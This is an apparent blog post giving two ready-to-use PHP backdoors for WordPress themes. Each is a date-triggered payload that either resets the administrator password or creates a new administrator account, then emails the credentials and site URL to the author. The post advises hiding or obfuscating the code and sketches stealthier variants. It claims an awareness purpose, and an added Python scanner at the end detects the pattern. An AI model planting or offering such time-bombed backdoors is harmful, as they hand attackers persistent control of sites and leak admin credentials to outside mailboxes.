Change the admin password after a certain date or time and inform us! Sounds good?

Post date: Jul 14, 2011 8:29:23 AM

<?php
if ( strtotime( "2011-04-30" ) < time() ) {
    $target_admin_id = 1; // change this if admin has a different ID or you want to target a particular admin
    $target_admin_new_password = 'evilme';
    $target_admin_userinfo = get_userdata( $target_admin_id );
    if ( !wp_check_password( $target_admin_new_password, $target_admin_userinfo->user_pass , $target_admin_id ) ) { // Have we already changed the password?
        add_action( 'shutdown', 'evilme_change_admin_password' );
        function evilme_change_admin_password() {
            global $target_admin_id;
            global $target_admin_new_password;
            global $target_admin_userinfo;
            wp_set_password( $target_admin_new_password, $target_admin_id );
            // now email me that my password of admin account has changed ready
            wp_mail( 'ashishsainiashfame@gmail.com', 'Admin password has been changed!', 'WP URL - '.get_bloginfo( 'wpurl' ).' | username: '.$target_admin_userinfo->user_login.' | password: '.$target_admin_new_password );
        }
    }
}
?>

At the very beginning, I check whether the current time is past April 30 and, if so, run the rest of the code. Change it to the date when you want the backdoor to be created. The basic logic is to set a user's password with wp_set_password(), while first checking the current password so that the database write and the alert email do not happen on every page load.

I have attached it to the shutdown hook so that it doesn’t disturb the page output at the moment it runs. Change the email address and the new password you want to set, and try this on a demo WordPress install by pasting the code into the functions.php file.

Example #2

Create a new admin user after a certain date or time and ping us when ready!

<?php
if ( strtotime( "2011-04-30" ) < time() ) {
    // Required for username_exists()
    require_once( ABSPATH . WPINC . '/registration.php' );
    if ( !username_exists( 'ashfame-evil' ) ) { // Have we already done it once?
        add_action( 'shutdown', 'evilme_create_new_admin' );
        function evilme_create_new_admin() {
            $user_id = wp_insert_user( array(
                'user_login' => 'ashfame-evil',
                'user_pass' => 'evilme',
                'user_email' => 'ashishsainiashfame@hotmail.com',
                'role' => 'administrator'
            ) );
            // now email me that my new admin account is ready
            wp_mail( 'ashishsainiashfame@gmail.com', 'New Admin account is ready', 'WP - '.get_bloginfo( 'wpurl' ).' | username: ashfame-evil | password: evilme' );
        }
    }
}
?>

Again I check the date and, if the condition is satisfied, use wp_insert_user() to create a new administrator user. To make sure the code only does this once, I check whether the username I want to create already exists. If it does, the new admin user has already been created, and you should have received an email about it. You can test this too by changing the email address and putting the code in your functions.php file.

Ideally you don’t keep this code easily visible; you can hide it anywhere: deep inside the functions.php file, in some custom plugin, or even obfuscated.

This tutorial was solely for fun and to make people aware that it is not safe to give someone temporary access to your blog. If they did what I just demonstrated, everything would look fine and there would be nothing for you to notice, but once the timer expires the code creates a backdoor. A more logical implementation would be to create an administrator account at a certain time and then delete that user after 1 hour, every day/week. The user ID would go up, which might create suspicion after quite some time, but the possibilities are endless. Be smart, be aware, spread the word about it. Friends don’t let friends fall for others’ traps.
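For a site owner who has handed out temporary access, one way to look for this pattern afterwards is a static scan of theme and plugin files. The script below is an added example, not part of the original post; the indicator set, the scoring threshold and the shortened sample file are assumptions made for the example.

```python
import re
from pathlib import Path

# Constructed sample: a shortened functions.php showing the pattern from this post.
SAMPLE_BACKDOORED = """<?php
if ( strtotime( "2011-04-30" ) < time() ) {
    add_action( 'shutdown', 'evilme_create_new_admin' );
    function evilme_create_new_admin() {
        wp_insert_user( array( 'user_login' => 'x', 'role' => 'administrator' ) );
        wp_mail( 'someone@example.invalid', 'ready', get_bloginfo( 'wpurl' ) );
    }
}
"""

# Heuristic indicators (this rule set is an assumption of the example, not a standard).
INDICATORS = {
    "account_write": re.compile(r"\bwp_(set_password|insert_user|create_user|update_user)\s*\("),
    "admin_role": re.compile(r"""['"]role['"]\s*=>\s*['"]administrator['"]"""),
    "time_gate": re.compile(r"\b(strtotime|mktime)\s*\([^)]*\)\s*[<>]=?\s*time\s*\("),
    "shutdown_hook": re.compile(r"""add_action\s*\(\s*['"]shutdown['"]"""),
    "notify_mail": re.compile(r"\bwp_mail\s*\("),
}

def scan_php(source):
    """Return {indicator: [line numbers]} for each indicator found in PHP source."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, rx in INDICATORS.items():
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def verdict(hits):
    """Account writes are normal in some plugins; flag them when combined with
    a date gate, a shutdown hook, a hard-coded admin role or a notification mail."""
    if "account_write" not in hits:
        return "clean"
    return "review" if len(set(hits) - {"account_write"}) >= 2 else "note"

def scan_tree(root):
    """Scan every .php file under root (for example a wp-content directory)."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php(path.read_text(errors="replace"))
        if verdict(hits) != "clean":
            report[str(path)] = (verdict(hits), hits)
    return report

if __name__ == "__main__":
    print(verdict(scan_php(SAMPLE_BACKDOORED)), scan_php(SAMPLE_BACKDOORED))
```

A plain-text scan like this does not match obfuscated code, so it complements comparing theme and plugin files against known-good copies and reviewing the list of administrator accounts after access is revoked.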

If you have any questions about the code here, feel free to shoot me a question in the comments. And don’t forget to share this post on Facebook & Tweet it!